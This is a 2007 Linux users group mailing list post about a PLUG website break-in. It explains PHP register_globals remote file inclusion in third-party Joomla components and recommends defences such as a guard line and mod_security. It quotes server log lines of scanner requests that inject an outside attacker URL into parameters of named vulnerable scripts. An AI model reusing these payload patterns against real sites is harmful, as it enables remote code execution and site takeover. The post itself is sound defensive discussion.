PLUG site incident last night
JD Austin
jd at twingeckos.com
Mon Jan 1 17:25:44 MST 2007
Using url tricks crackers exploit in many types of web applications.
The register_globals feature in php is used to trick the site into using
a different configuration .php file in another location across the net
and run it. It's a trick as old as CGI.
Looking at my logs I see TONS of these types attempts:
208.31.216.8 - - [01/Jan/2007:08:59:52 -0500] "GET
/becommunity/community/index.php?pageurl=http://morfeus.us/M.php?&/
HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
208.31.216.8 - - [01/Jan/2007:08:59:53 -0500] "GET
/shoutbox/expanded.php?conf=http://morfeus.us/M.php?&/ HTTP/1.1" 404
1244 "-" "Morfeus FXXXking Scanner"
208.31.216.8 - - [01/Jan/2007:08:59:56 -0500] "GET
/dotproject/modules/tasks/addedit.php?root_dir=http://morfeus.us/M.php?&
/ HTTP/1.1" 200 176 "-" "Morfeus FXXXking Scanner"
208.31.216.8 - - [01/Jan/2007:09:00:00 -0500] "GET
/My_eGallery/public/displayCategory.php?basepath=http://morfeus.us/M.php?&/
HTTP/1.1" 404 1244 "-" "Morfeus FXXXking Scanner"
208.31.216.8 - - [01/Jan/2007:09:02:09 -0500] "GET
/modules/mod_mainmenu.php?mosConfig_absolute_path=http://morfeus.us/M.
php?&/ HTTP/1.1" 403 1240 "-" "Morfeus FXXXing Scanner"
It was never an issue with Joomla itself but third party components and
modules coded by people less security minded have been exploited.
com_extcalendar, com_galeria a few others were commonly used to
overwrite the index.php and configuration.php files. From there they'd
use php to create and run shell scripts to do various malicious things.
Components should have this in them somewhere:
defined( '_VALID_MOS' ) or die( 'Restricted access' );
Since Joomla 1.0.11 this issue has been addressed using .htaccess and
re-coding to allow register globals to be turned off. Since Joomla is
used on a wide range of platforms (even windows) they still support the
old register_globals method of variables but try to coerce users into
setting it up right.
I also install mod_security to make that sort of attack stop in it's tracks.
JD
Technomage wrote:
> this may sound like a stupid question on my part (sorry guys, I've been
> working lately, so I haven't kept up): what exactly was cracked on the site
> and how was it done?
>
> details would be greatly appreciated.
>
> thanks.
>
>
> On Monday 01 January 2007 04:29, Jim wrote:
>
>> Edward Norton wrote:
>>
>>> PLUG cracked AGAIN? Not surprising considering you guys wont consider
>>> anything other than a badly coded PHP CMS.
>>>
>> Ed,
>>
>> Apparently you know more about securing a site than the people who run
>> it. At least that's what your message implies. I have an idea. When
>> it's time for the next PLUG meeting, come out of the sewer, show up at
>> the meeting and offer to help secure the site.
>>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change you mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.PLUG.phoenix.az.us/pipermail/plug-discuss/attachments/20070101/e35c9d37/attachment.htm
More information about the PLUG-discuss
mailing list